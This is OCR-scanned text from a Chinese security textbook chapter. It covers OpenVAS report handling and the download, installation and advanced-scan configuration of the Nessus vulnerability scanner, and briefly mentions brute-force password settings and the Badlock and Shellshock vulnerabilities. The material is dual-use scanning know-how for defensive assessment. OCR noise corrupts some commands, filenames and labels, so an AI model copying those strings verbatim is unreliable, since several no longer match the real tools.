表 左 侧 的 图 标 为 其 添加 注释 信息 。 这 个 可 以 通过 单 击 右 侧 左边 的 Add Note 按 钮 进行 添加 。 
如 果 扫 描 出 的 漏洞 并 不 存在 ， 这 里 只 是 误 报 ， 再 或 者 漏洞 确实 存在 但 威胁 并 没有 那么 高 ， 
这 时 可 以 调整 漏洞 评分 ， 通 过 单 击 最 右 侧 的 Add Override 按 钮 ， 可 以 在 打开 的 New Override 
对 话 框 中 进行 调整 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


VewW OvVerride 


一 
Active (©) yes, always 
yes, forthe next | 30 days 
no 
Hosts Any re) 192.163.1.105 
Location Any (e) generaltcp 
Severity Any (se) > 0.0 
New Severity (©) | False Positive Y Other: ] 
Task Any 【es) mmediate%20scan%2008620IP%20192.168.1.105 
Result (0) Any Dnlytha selecied one (faa6373-080f4a57-8015-d638ca60a699) 
Text 


扫描 结束 后 可 以 通过 左上 方 选择 不 同 
的 格式 导出 扫描 报告 ， 如 下 图 所 示 。 


lis Anonymous XML 7 加 所 和 芷 


外 


@ Report: Results (52 of 373) 


step 图 这 里 包含 了 大 量 的 导出 格式 ， 单 击 导 
出 格式 右 侧 的 下 拉 按 钮 ， 可 以 在 弹出 的 下 
拉 列 表 中 进行 选择 。 这 里 以 导出 PDF 格 式 为 
例 ， 如 下 图 所 示 。 


LaTeX 


NBE 
PDF 


Topology SVG 


TXT 


[step 图 选择 完 导 出 格式 后 ， 单 击 向 下 葡 头 的 
图 标 可 以 导出 扫描 报告 ， 同 时 可 以 选择 直 
接 打 开 或 存放 到 某 一 位 置 ， 如 下 图 所 示 。 


2. 其 他 功能 


Opening report-c3771d60-0794-44f6-8866-c8de0e048d65.xml 侠 
You have chosen to open: 


report-c3771d60-0794-44f6-8866-c8de0e048d65.xml 


Which is: XML 文档 (497 KB) 
from; https://127.0.0.1:9392 


What should Firefox do with this file? 


JJDpenwith | 文本 编辑 器 (default) v 


|_J Do this automatically for files like this from now on. 


Ok | 


如 果 选 择 直 接 打 开 ， 可 以 直接 打开 
并 隆 出 扫描 报告 ， 如 下 图 所 示 。 可 以 看 到 
OpenVAS 会 按照 分 类 生成 PDF 格式 的 文档 。 
这 个 文档 的 可 读 性 还 是 很 融 的 ， 主 要 包括 漏洞 
的 分 析 、 修 复方 案 以 及 修复 补丁 的 地 址 等 。 


4 共 52 页 


Cancel | 


器 alsleee 


= Result Overview 3 
Host Authentications 3 

™ Results per Host 3 
3 

5 


™ 192.168.1.105 


High 80/tcp 


Highio99/tcp 10 
High S13/tcp 了 了 
High 514HtcP Eb | 


High 6200/tcp 12 
High general/tcp 13 


High 21/tcp 14 
High 1524/tcp 15 
High 512/tcp 15 


High 3306/tcp 16 
High 5432/tcp 17 
High 5900/tcp 18 
High 3632/tcp 18 
High 22/tcp 19 
Medium 80/tcp 20 
Medium 21/tcp 29 
Medium 6667/tcp 30 


= 自 0 


除了 上 述 介绍 的 功能 外 ，OpenVAS 还 提供 有 很 多 其 他 功能 ， 下 面 分 别 进行 介绍 。 
(1) 以 图 表 的 形式 查看 扫描 报告 功能 。OpenVAS 会 将 扫描 的 漏洞 以 图 表 的 形式 进行 
展现 ， 通 过 选择 Assets 菜单 下 的 Operating Systems 菜单 项 可 以 以 图 表 形 式 查 看 扫描 报告 ， 


如 下 图 所 示 


一 


os Operating Systems (6 of 6) 


v Operating Systems by Severity C.,.. 


国 High 


v Operating Systems by Vulnerabil,.， v Operating Systems by CVSS (Tota.,, 


cpe:/o:linux:kernel 
.…/o:canonical:ubuntu linux 
cpe:/o:microsoft:windows 
.Nonical:ubuntu linux:8.04 
.lo:deblan:deblan linux 


.oO:Microsoft:windows xp 


0246810 NAO 1 2345567 8 910 
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(2) 以 不 同 评分 参考 标准 展现 扫描 结果 。 在 OpenVAS 中 给 出 了 不 同 的 漏洞 评分 参考 
标准 ， 并 以 图 表 或 详细 列表 的 形式 进行 展现 。 该 功能 存放 在 SecInfo 菜单 列表 之 中 ， 如 下 
图 所 示 。 


Dashboard 


NVTs 

CVEs 

CPEs 

OVAL Definitions 
CERT-Bund Advisories 


DFN-CERT Advisories 


(3) 以 NVTs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 NVTs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 NVTs 参考 的 漏洞 图 表 展 示 ， 以 及 漏洞 数量 。 


人 NVTs (48054 of 48054) 
 NVTs by creation time (Total: 480... 忆 NVTs by Family (Total: 48054) 


国 High 

网 Medium 

| Low 
Log 


NN 


0 3 
200B00B01001201201@018 


(4) 以 CVEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CVEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CVEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


0 CVEs (114679 of 114679) 
cvEs by severity class (Totat: 114.. > CVEs by creation time (ptat 114.. -cvEs by cvss (ots 114679) 


贺 High 


i 40.000 
国 Medium 20,000 120,000 5 000 
| Low 18,000 110.000 ， 
Log 16.000 100,000 30,000 
i 90.000 i 
30,000 . 
CD 70,000 20,000 
10,000 50,000 
8,000 50 000 15,000 
6.000 40,000 10,000 
30,000 a 
en 20,000 ’ 
2,000 10.000 0 
0 0 NAO 12345678910 


199019952000200520102015 


(5) 以 CPEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CPEs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 CPEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


CPE 
"© cpEs (286689 of 286689) 


=- CPEs by Severity Class (Total: 286.., v CPEs by creation time (Total: 286... v CPEs by CVSS (Total: 286689) 


i 一 1 year ---- 


70.000 
几 Medium 45,000 NE 【有 
| Low 40.000 
Log 250,000 50 000 
NA 30,000 A |Fz00000 40.000 
25,000 
150,000 30.000 
20,000 
15,000 100,000 30 000 
10,000 10,000 
50,000 
5,000 
0 0 NIA0O 123456748910 


199019952000200520102015 


Wp 
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(6) 以 OVAL 参考 标准 展示 漏洞 图 表 功 能 。 选 择 OVAL Definitions 菜单 命令 ， 在 打开 
的 下 区 图 所 未 的 卉 面 中 列 出 了 使 用 OVAL 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


2 OVAL Definitions (28175 of 28175) 


~ OVAL Definitions by Severity Clas... = OVAL Definitions by creation time... ~ OVAL Definitions by class (Total: 2... 


compliance 
国 inventory 

国 miscellaneous 
| patch 
vulnerability 


(7) 以 CERT-Bund 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CERT-Bund Advisories 荣 单 
命令 ， 在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 CERT-Bund 参考 标准 展示 的 漏洞 图 表 ， 


{ PS | 
Ey CERT-Bund Advisories (9209 of 9209) 
v CERTBund Advisories by Severity,... v CERTBund Advisories by creation .,， v CERT-Bund Advisories by CVSS [To... 
国 High 
央 Medium 260 10,000 2,200 
| "Low 240 pe epee 2,000 
220 pF 1.600 
N/A 于 上 8.000 ep 
160 -6,000 1 200 
140 上 5.000 1.000 
120 
100 4,000 500 
| 600 
80 -3,000 
60 2.000 加 
40 - 
20 1,000 D0 一 加 
0 0 WA0 123454678910 
2014 2015 2016 2017 2016 


(8) 以 DFN-CERT 参考 标准 展示 漏洞 图 表 功 能 。 选 择 DEFEN-CERT Advisories 菜单 命令 ， 
在 打开 的 下 图 所 示 的 界面 中 列 出 了 使 用 DFN-CERT 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 
数量 。 


~ DFN-CERT Advisories by creation ,,， ~ DFN-CERT Advisories by CVSS (Tot... 


i 


500 图 
-天 


NAO LI2345678 910 


si 
2008 2010 2012 2014 2016 2018 


多 提示: 可 以 通过 每 个 界面 中 的 查询 ， 查 询 出 某 个 浙 洞 在 该 评分 村 准 中 的 信息 。 


12.5 ”使 用 Nessus 扫 描 漏洞 


Nessus 是 目前 使 用 最 为 广泛 的 系统 漏洞 扫 摘 与 分 析 软 件 ， 该 工具 提供 了 完整 的 漏洞 扫 
描 服 务 ， 并 随时 更 新 漏洞 数据 库 。Nessus 不 同 于 传统 的 漏洞 扫描 软件 ， 可 同时 在 本 机 或 远 
端 进行 系统 的 漏洞 扫 拉 分析。 
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12.5.1 下 载 Nessus 软 件 


在 使 用 Nessus 扫 描 系 统 漏洞 之 前 ， 首 先 需 要 下 载 Nessus 软 件 ， 具 体操 作 步 又 如 下 : 


在 浏览 器 的 地 址 栏 中 输入 网 址 https:Wwww.tenable.comydownloads， 在 下 载 页 面 中 找 
到 Nessus 软 件 ， 如 下 图 所 示 。 


Downloads 


Nessus 


Download Nessus and Nessus Manager. 


单 击 Nessus 会 跳 转 到 Nessus 软 件 下 载 界 面 ， 如 下 图 所 示 。 
Nessus 


Need an Activation Code? 


In order to complete your Nessus installation, you need an activation code if you dont have one already. 


Get Activation Code 


Binary download files for Nessus Professional, Nessus Manager, and connectine Nessus Scanners to Tenable.io & SecurityCenter. 


[seep 图 Nessus 家 用 版 是 免费 的 ， 但 是 也 需要 ”|step 图 在 注册 界面 中 ， 输 入 用 户 名 与 邮箱 
注册 获取 注册 码 ， 单 击 Get Activation Code 地址 ， 单 击 Register 按 钮 ， 会 提示 注册 码 已 
按钮 ， 跳 转 到 版 本 界面 ， 如 下 图 所 示 。 发 送 至 你 的 邮箱 ， 然 后 会 出 现 一 个 下 载 按 
钮 ， 如 下 图 所 示 。 


Nessus Home 


Free 
Download Nessus 


To download Nessus, visit the Nessus 
Download page. 


Nessus® Home allows you to scan your personal home network with the 
same powerful scanner anjoyed by Nessus subscribers,. 


For Home Users 


Scan 16 1ps 


NessusHome features: 


High-speed, accurate assessment with thousands of checks 登 东 邮 箱 会 发 现 Nessus 发 送 的 激 活 
Agentless scanning of home networks 码 9 A 下 图 所 示 o 


PS 


GOtenable 


Register Now 


单 击 Register Now 按 钮 ， 跳 转 到 注册 
界面 ， 如 下 图 所 示 。 Nessus Home Evaluation 


。 。 Welcome to Nessus Home and congratulations on taking action to secure 

Register for an Activation Code . 
your personal network! We offer the latest plugins for vulnerability scanning 

today, helping you identify more vulnerabilities and keep your personal 


network protected. 


First Name * Last Name * 


If you use Nessus in a professional capacity and want advanced capabilities 
Email * such as unlimited assessments, or the ability to perform compliance checks 
or content audits, Nessus Professional may be better suited to your needs. 
To learn more view the Nessus professional datasheet or request a free 


evaluation. 


_|Checktoreceive updatesfrom Tenable 


Activating Your Nessus Home Subscription 


Your activation code for Nessus Home is: 


pp | 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


输入 uname -4d 命令 查看 kail 内 核 信 
息 ， 以 选择 需要 下 载 哪 个 版 本 的 Nessus 软 
件 ， 如 下 图 所 示 。 


oot@kali:-~# uname -a 
( 


inux kali 4.18.0-kali2-amd64 #1] SMP Debian 4.18.10-2kalil 
2918-196-69) x86 64 GNU/Linux 


根据 自己 的 系统 选择 相应 的 版 本 。 
这 里 选择 Debian 系 统 类 型 的 版 本 ， 如 下 图 
所 示 。 


各 Nessus-8.0.0-debian6 i395.deb Debian 6,7,8,9 / Kali Linux 1,2017.3 i386(32-bit) Checksum 

DO Me5ssu5-8.0.0.dmg macos (10.8 - 10.13) Checksum 

DD Ne55u5-8.00-es5.386.rpm Red Hat ES 5 i386(32-bit) { CentOS 5 / Oracle Linux 5 Checksum 
(including Unbreakable Enterprise Kernel) 

Nessus-8,0,0-amzn.x86 64rpm Amazon Linux 2015.03, 2015.09, 2017.09 Checksum 

Nessus-8,0.0-es6.x86_64.1pm Red Hat ES 6 (64-bit) { CentOs 6 / Orade Linux 6 Checksum 
[including Unbreakable Enterprise Kernel) 

Dy Nessus-8,0,0- Debian 6, 7, 8,9 / Kali Linux 1, 20173 AMD64 Checksum 

debian6 amd6%.deb 


选择 版 本 后 会 弹出 一 个 许可 协议 ， 单 
击 IAgree 按 钮 ， 如 下 图 所 示 。 


License Agreement 


and/or domages finally awarded agninst You by a co 
(b) If Your use of the Software is, or in Tenable’'s opinion is likely to be, the subjert of an infringement claim, or if required by 


settlement Tenable may in its sole discretion and expense, (i) substitute for the 5oftware substantially functionally similar non- 


rt of competent jurisdiction, 


infringing software; (li) procure for You the right to continue using the Software; oniii) terminate this ee accept return of 
the Software and provide & pro rata refund to You, The pro rata refund will be calkulated as follows; (1) for subscriptions, Tenable 


Will provide a refund of any prepaid License Fees for the unused remainder of the license term; and 2) for perpetual licenses, 
23. Dispute Resolution 


All pt af er Out of or relatir ee to this 2 ent shall be subject to arbitration within the meaning of the Arbitration Act 
2010 or any leeislation amending cpealing that act and shall be arbitration conducted in Dublin, Ireland in the Cnelish 


language shall be sovemed 世 aa Act 2010， 


ee 会 弹出 一 个 打开 还 是 保存 文件 

的 信息 提示 ， 这 里 选择 保存 ， 单 击 OK 按钮 
即 可 开始 下 载 并 保存 Nessus 软 件 ， 如 下 图 
所 示 。 


Opening Nessus-8.0.0-debian6 amd64.deb Be 


You have chosen to open: 
” Nessus-8,0.0-debian6_amd64.deb 


whichis: Debian 软件 包 (63.8 MB) 
from: https://tenable-downloads-production.s3.amazonaws.com 


What should Firefox do with this file? 


上 归档 管理 器 (default) v 


(Open with 


|_ Dothis automatically for files like this from now on. 


Cancel OK 


12.5.2 ”安装 Nessus 软 件 


Nessus 软 件 下 载 完 成 后 ， 
了 。 有 具体 操作 步骤 如 下 : 
切换 到 Nessus 安 装 包 目录 ， 使 用 
dpkg -1 Nessus-8.0.0-debian6 amd64.deb 命 
令 ， 执 行 安 装 ， 执 行 效果 如 右上 图 所 示 。 


就 需要 安装 


228 


安装 完成 会 提示 用 于 登录 管理 界面 的 网 络 
地 址 。 


root@kali:~/Downloads# dpkg -i NesSuS-8.5.6-debian6 amd64. deb 
正在 选中 未 选择 的 软件 包 nessus。 

(正在 读 取 数据 库 ... 系统 当前 共 安装 有 379781 个 文件 和 目录 。 ) 
准备 解压 Nessus-8.0.9-debian6 amd64.deb  ... 

正在 解压 nessus (8.0.0) ... 

正在 设置 nessus (8.0.0) ... 

Unpacking Nessus Scanner Core Components... 


- You can start Nessus Scanner by typing /etc/init.d/nessusd start 
- Then go to https://kali:8834/ to configure your scanner 


正在 处 理 用 于 systemd [239-19| 的 触发 器 ... 


使 用 /etc/init.d/nessusd start 命 令 ， 启 动 
Nessus。 执 行 效果 如 下 图 所 示 ， 说 明 Nessus 
已 经 局 动 。 


root@kali:~/Downloads# /etc/init.d/nessusd star 
Starting Nessus : . 


在 网 页 浏览 器 中 输入 https://kali: 
8834” 网 址 ， 打 开 Nessus 网 页 管理 界面 。 首 
次 打开 会 提示 网 页 没有 安全 证 书 ， 如 下 图 
所 示 。 


[91 YoUr conNnnecticn Is Not secure 


The owner of kali has configured their website improperly, To protect your information from being stolen, Firefox has 
no connected Lo 由 is websile 


leam more... 


Report errors like this tohelp Mozilla identify and block malicious sites 


单 击 Advanced 按 钮 ， 进 入 如 下 图 所 示 
的 高 级 选项 页 面 。 


Mdvanced 


kali:8834 uses an invalid security certificate. 


The certificate is not trusted because the issuer certificate is unknown. 
The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported, 


Error code: SEC_ERROR_UNKNDWN_ISSUER 


Add Exception.. 


页 面 中 ， 单 击 Add 
然后 单 
获取 证 


在 高 级 选项 
Exception 按 钮 ， 添 加 证 书 为 可 信 ， 
击 Confirm Sercurity Exception 按 钮 ， 
书 ， 如 下 图 所 示 。 


Add Security Exception 全 


You are aboutto override how Firefox identifies this Site. 
Legitimate banks, stores, and other public sites will not ask you to dothis. 


Server 
Location: | https://kali-8834 Get Certificate | 
Certificate Status 
This site attempts to identify itself with invalid information, View.. | 
Unknown ldentity 


The certificate is not trusted because It hasn't been verifled as issued by a trusted authority using a secure signatura. 


[JPermanently store this exception 


Confirm Security Exception Cancel 


首次 登录 需要 先 注册 一 个 
号 。 下 图 为 管理 员 注 册 界 面 。 


管理 员 账 


Nessus@ 


Create an account 


Username * 


Password * 


[step[g 在 管理 员 注 册 界 面 中 ， 输 入 完 用 户 命 
与 密码 ， 单 击 Continue 按 钮 ， 跳 转 到 注册 激 
活 界 面 ， 输 入 邮箱 获取 的 激活 码 ， 如 下 图 
所 示 。 


Nessus@O 


Register your scanner 
Enter al tivat je below to rul U 

lly 8 Ot the dropdow tions | 
Il 上 ln ma 


Scanner Type 


Home, Professional or Manager se 


Activation Code * 


在 首页 中 选择 左 侧 的 Policies 选 项 ， 进 入 
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激活 以 后 Nessus 会 初始 化 目前 的 漏洞 
检测 库 ， 如 下 图 所 示 。 


Nessus@O 


Initializing 


N 


等 待 漏洞 检测 库 更 新 完成 后 ， 登 录 并 
进入 主 界面 ， 如 下 图 所 示 。 


Nessus@ 六 
My Scans lmpor New Folder 
| mir My Scans 
面 All Scans 
Craate a new scan 
昔 Trash 
© polces 


园 Plugn Rules 


多 ”Scanners 


(多 注意 : Nessus 与 OpenVAS 不 同 ，Openvas 


在 进行 扫描 之 前 需要 一 个 配置 、 定 义 一 个 
主机 、 创 建 一 个 任务 然后 才能 进行 扫描 ， 
而 Nessus 则 是 选择 不 同 的 策略 。 


策略 项 界面 ， 如 下 图 所 示 。 


Policies 


E 江 


Policies allow you to create custom templates defining what actions are performed during a scan. Once 
created, they can be selected from the list of scan templates. From this page you can view, create， 
import, download, edit, and delete policies. 


Create a new policy 


Import 


首次 进入 是 没有 创建 策略 的 ， 这 里 需要 先 创建 一 个 策略 ， 单 击 New Policy 按 钮 ， 创 
建 一 个 新 的 策略 。 用 户 也 可 以 在 打开 的 下 图 所 示 界 面 中 选择 Nessus 给 出 的 策略 模板 。 


Policy Templates 


《Back to Policies 


Scanner 


Advanced Scan Audit Cloud Infrastructure 


Badlock Detection 


从 


Bash Shellshock Detection Basic Network Scan 


ce 
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交 提 示 : Nessus 默 认 提 供 了 很 多 策略 模 
板 ， 选 择 相应 的 模板 即 可 ， 当 然 它 是 一 
个 商业 版 漏洞 扫描 器 ， 因 此 有 一 些 模板 
是 收费 的 ， 凡 是 右上 角 注 有 upgrade 字 样 
的 都 需要 升级 到 专业 版 及 以 上 版 本 才 可 
以 使 用 。 


12.5.3 ”高 级 扫 摘 设置 


高 级 扫描 (Advanced Scan) 是 Nessus 
提供 的 一 个 针对 所 有 网 络 设备 的 基础 扫 
描 ， 其 他 类 型 的 扫描 都 是 基于 它 的 扩充 或 
者 修改 。 高 级 扫 摘 中 有 很 多 的 设置 项 ， 了 


解 每 一 项 的 作用 对 于 配置 适合 的 扫描 类 型 
有 多 大 帮助 。 

高 级 扫描 设置 的 操作 步骤 如 下 : 
在 Policy Templates 设 置 界 面 中 选择 
Advanced Scan 人选 项， 进入 Advanced Scan 设 
置 界面 ， 如 下 图 所 示 。 


New Policy / Advanced Scan 


《Back to Policy Templates 


Credentials 


Settings Compliance Plugins 


在 基础 (BASIC) 信息 设置 界面 中 ， 
可 以 输入 名 字 ， 以 及 一 些 描述 信息 ， 如 下 
图 所 示 。 


BASIC 
Nam 
General pe 
Permissions Ne 
Description 
DISCOVERY 
ASSESSMENT 
REPORT 


ADVANCED 


选择 DISCOVERY (权限 ) 选项 ， 该 选项 提供 有 3 个 子 选项 ， 包 括 Host Discovery ( 主 
机 发 现 ) 、Port Scanning《 端 口 扫描 ) 、Service Discovery( 服 务 发 现 ) ， 如 下 图 所 示 。 


DISCOVERY 


Port Scanning 


ASSESSMENT 


REPORT 


ADVANCED 


Host Discovery 


Service Discovery 


选择 Host Discovery 选 项 ， 在 打开 的 界面 中 可 以 设置 Ping 远 程 主机 的 方法 ， 包 括 两 
项 ， 第 1 项 表示 本 机 在 测试 范围 之 内 ， 第 2 项 为 快速 网 络 发 现 。 如 果 远 程 主 机 发 送 Ping 包 ， 
Nessue 为 了 避免 误 报 会 执行 其 他 操作 来 验证 ， 如 下 图 所 示 。 


BASIC - 
Remote Host Ping 
DISCOVERY 
Ping the remote host 各 
Host Discovery 
Port Scanning 
General Settings 
Service Discovery 


* Test the local Nessus hosi 


ASSESSMENT 
REPORT 


ADVANCED Use fast network discovery 


这 里 可 以 选择 多 种 协议 类 型 ， 包 括 ARP、 


侈 提示 : Ping 包 的 模式 选择 ， 如 下 图 所 示 。 
TCP、ICMP 及 UDP 等 。 由 于 UDP 测试 并 不 是 很 准确 ， 所 以 这 里 默认 并 没有 选择 ， 但 是 仍 
然 提 供 有 该 选项 。 
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Ping Meihods 


w ARP 


~ TCP 


Destination ports built-in 


“vw ICMP 


Assume ICMP unreachable from the gateway means the host is down 


Maximum number of retries 2 


UDP 


比较 脆弱 的 网 络 设备 有 3 个 选项 可 供 
选择 ， 包 括 是 否 有 共享 打印 、 扫 描 网 络 设 
备 、 扫 描 网 络 控制 设备 ， 如 下 图 所 示 。 


Fragile Devices 


Scan Network Printers 


Scan Novell Netware hosts 


Scan Operational Technology devices 
设置 局 域 网 唤醒 选项 ， 可 以 加 入 含有 
MAC 地 址 表 的 文件 ， 以 及 唤醒 等 待 时 间 ， 
这 里 以 分 钟 为 单位 ， 如 下 图 所 示 。 


Wake-on-LAN 
List of MAC addresses Add File 
Boot time wait (in minutes) 5 


选择 端口 扫描 ， 进 入 端口 过 滤 设 置 
界面 ， 如 果 选 中 Consider unscanned ports as 
closed 复 选 框 ， 则 扫描 的 端口 将 视 为 关闭 不 再 
进行 扫描 ， 这 里 建议 不 选中 ， 如 下 图 所 示 。 


BASIC 


Ports 
DISCOVERY Y 
Consider unscanned ports as closed 
Host Discovery 


Port Scanning Port scan range: default 


Service Discovery 
本 地 端口 集合 设置 界面 ， 这 里 优先 检 
查 SSH、WMI、SNMP 这 些 服务 端口 ， 只 有 
当 本 地 端口 枚 举 失 败 后 才 运 行 网 络 端口 扫描 
程序 。 最 后 一 项 默认 没有 勾 选 ， 它 用 于 验证 
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本 地 所 有 打开 的 TCP 端 口 ， 如 下 图 所 示 。 


Local Port Enumerators 


vw SSH (netstat) 


ww WMI (netstat) 


ww SNMP 


w Ony runnetwork port scanners if local port enumeration failed| 


Verify open TCP ports found by local port enumerators 


网 络 端口 扫描 使 用 默认 的 SYN 包 进 
行 检测 ， 如 果 需 要 进行 防火 墙 过 滤 检 测 可 
以 选中 下 方 的 Override automatic firewall 
detection 选 项 ， 这 里 给 出 了 3 个 模式 : 默认 
简单 检测 (Use soft detection ) 、 主 动 检 
测 (Use aggressive detection) 、 禁 用 检测 
(Disable detection) ， 如 下 图 所 示 。 


Network Port Scanners 


w SYN 


Override automatic firewall detection 


se soft detectiol 


ceive detection 


选择 服务 发 现 选项 ， 探 测 所 有 端口 以 
查找 服务 ， 尝 试 将 每 个 开放 端口 映射 到 该 
端口 上 运行 的 服务 ， 如 下 图 所 示 。 


General Settings 


w Probe all ports to find services 


注意 ， 在 一 些 罕 见 的 情况 下 ， 这 可 
能 会 中 断 一 些 服 务 ， 并 导致 不 可 预见 的 副 
作用 。 
搜索 SSL/TLS 服 务 界 面 ， 默 认为 打开 
状态 ， 可 以 选择 只 搜索 SSL/TLS 服 务 ， 或 搜 
索 所 有 端口 ， 识 别 是 否 有 快 过 期 的 证 书 ， 
默认 选择 枚 举 所 有 SSL/TLS 密 码 ， 启 用 CRL 
检查 (连接 到 Internet) ， 如 下 图 所 示 。 


Bearch for SSLTLS services li 


Search for SSLTLS on Known SSUTLS ports 


Known SSUTLS ports 


Identify certificates expiring within 
All ports 


ww Enumerate all SSLTLS ciphers 


Enable CRL checking (connects to the Internet) 
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在 Accuracy 界 面 中 可 以 进行 准确 性 设 
置 和 执行 彻底 扫描 ， 其 中 准确 性 有 两 项 可 
选 ， 第 1 项 避免 可 能 存在 的 虚假 报警 ， 第 2 
项 显示 出 可 能 存在 的 虚假 报警 ， 执 行 彻 底 
的 测试 ， 这 个 存在 一 定 风 险 ， 可 能 破坏 网 
络 或 影响 扫描 速度 ， 如 下 图 所 示 。 


Accuracy 


Overrlde normal accuracy 


tential 1alse alarm 


Periorm thorough tests (may disrupt your network or impact scan spesd) 


在 Antivirus 与 SMTP 界 面 中 ， 可 以 对 
反 病 毒 定义 宽 限 期 〔 以 天 计 ) ， 可 以 对 邮件 
设置 域名 、 服 务 器 地 址 等 ， 如 下 图 所 示 。 


Antivirus 


Antivirus definition grace period (in days): 0 了 


SMTP 


Third party domain example.com 


From address nobody@example.com 


ITo address postmaster@[AUTO_REPLACED _IP] 


在 General Settings 与 Oracle Database 
设置 界面 中 ， 可 以 设置 用 户 上 默认 提供 的 凭 
证 ， 如 果 用 户 的 密码 策略 设置 为 在 多 次 无 
效 党 试 后 锁定 账户 ， 则 用 于 防止 账户 锁 
定 ， 使 用 Oracle 数 据 库 测试 默认 账户 可 能 会 
比较 慢 ， 如 果 有 需要 也 可 以 选择 ， 如 下 图 
所 示 。 


General Settings 


ww Only usecredentials provided by the user 


Dracle Database 


Test default accounts (slow) 


(多 提示 : Nessus 启 用 了 Hydra (在 线 密码 
破解 ) 工具 配合 生成 密码 规则 ， 如 下 图 所 
示 。 这 里 可 以 导入 登录 账号 文件 ， 登 录 密 
码 文 件 等 ， 并 设置 并 行 任务 数量 、 超 时 时 
间 、 尝 试 空 密码 、 党 试 以 密码 登录 、 在 第 
一 次 成 功 后 停止 暴力 强迫 、 测 试 默认 账户 
等 参数 。 
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Fyara 


侈 注意 : Nessus 还 具有 其 他 高 级 扫描 设置 
选项 ， 这 里 不 再 详细 介绍 ， 用 户 可 以 自行 
安装 该 软件 后 ， 然 后 打开 该 软件 的 设置 界 
面 ， 从 中 学 习 各 个 设置 选项 的 作用 。 


12.5.4 其 他 扫 摘 项 


Nessus 除 了 提供 高 级 扫 摘 以外， 还 设置 
了 一 些 其 他 个 性 扫描 ， 这 些 个 性 扫描 有 的 
是 针对 特殊 漏洞 ， 有 的 是 针对 不 同 设备 。 


1. Balock Detection 漏 洞 


Badlock Detection 是 一 种 “协议 /中 间 
人 ”攻击 漏洞 ， 可 用 模拟 Windows AD ( 通 
过 批量 创建 和 编辑 用 户 账户 ， 指 派 管理 权 
限 等 ) 已 验证 的 用 户 身 份 发 动 攻 击 。 在 此 
种 攻击 中 ， 攻 击 者 可 被 授予 读 写 SAM 数 
据 库 的 权限 ， 可 能 造成 所 有 用 户 名 密码 和 
其 他 潜在 敏感 信息 泄露 。 漏 洞 编号 CVE- 
2016-2118 和 CVE-2016-0128， 在 Nessus 扫 
描 模 板 中 图 标 如 下 图 所 示 。 


天 


Badlock Detection 


针对 Badlock Detection 漏 洞 ，Nessus 提 
供 的 扫描 插件 ， 如 下 图 所 示 ， 这 里 只 列 出 
了 部 分 ， 有 具体 请 参考 软件 本 身 ， 其 他 扫描 
类 型 的 插件 也 同样 截取 部 分 。 
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Settings Credentlals plugins 分 
PLUGIN FAMILY 。 TOTAL > PLUGIN NAME PLUGIN ID 和 
CentOS Local Security Checks d CentOS 5 ; samba (CESA-2016;0621) (Badlock) 90452 
FreeBSD Local Secunty Checks 1 centos 5 : Samba3x (CESA-2016:0613) (Badlock) 90451 
General 1 CentOS 6 /7 :ipa/ libldb / libtalloc / libidb / libtevent / openchange ‘samba... 90450 
Misc 1 CentOS 6 : samba [CESA-2016:0611) (Badlock) 90449 
Oracle Linux Local Security Checks 一 
Red Hat Local Secunty Checks 
Scientific Linux Local Security Checks da 
Windows 1 
v v 


2. Bash Shellshock Detection 漏 洞 


Bash Shellshock Detection 漏 洞 ， 又 称 为 破 壳 漏洞 ， 会 影响 目前 主流 的 Linux 和 Mac OSX 
操作 系统 平台 。 在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


| 
" 


Bash Shellshock Detection 


针对 破 充 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Cregentlals piugins 所 
~ 人 入 
PLUGIN FAMILY 。 TOTAL PLUGIN NAME PLUGIN ID 
CenmtDS Local Security Checks 2 CentOS 51617 ;bash (CESA-2014:1293) (Shellshock) 77835 
CGI abuses 2 CentOS 51617 :bash (CESA-2014:1306) 77879 


Debian Loca Security Checks 
Fedora Local Security Checks ’ 


FreeBSD Local Security Checks 


FTP 1 
Gain a shell remotely d 
General 1 


3. Basic Network Scan 


Basic Network Scan， 基 础 网 络 设备 扫描 。 这 里 针对 基础 网 络 设备 ， 比 如 Windows 系 
统 、Linux 系 统 、 路 由 器 、 交 换 机 等 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Basic Network Scan 


针对 基础 网 络 设备 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settings Credentials Plugins 后 

PLUGIN FAMILY ， TOTAL 有 PLUGIN NAME PLUGIN ID 
AIX Local Securlty Checks 11334 | 2X ApplicationServer Tux System ActlveX ExportSettings[) Method Arbltrary... 58484 
Amazon Linux Local Security Checks 1154 2X Client TuxClientSystem Activex InstallClient() Method Arbitrary MS| Pa... 58321 
Backdoors 114 3CcTitpSvc Long Transport Mode Remote Ovaerflow 23735 
Brute force attacks 26 30-FTP Multiple Directory Traversal Vulnerablilities 33218 
CentOS Local Security Checks 2668 30Greetings Player ActveX Multiple Butfer Overfiows 26020 
Cel abuses 3934 vx MPEG-4 < 5.0.2 Buffer Overflow 29749 
Cel abuses : XSS E69 7-Zip< 16.00 Multiple Vulnerabilities 91230 
CISCO 3552 7-Zip< 16.03 NULL Pointer Dereference DoS 109799 


4. Credenticled Patch Audit 


Credenticled Patch Audit， 补 丁 扫描 。 主 要 是 针对 不 同 设 备 更 新 补丁 的 一 个 扫描 ， 在 
Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


Credentialed Patch Audit 


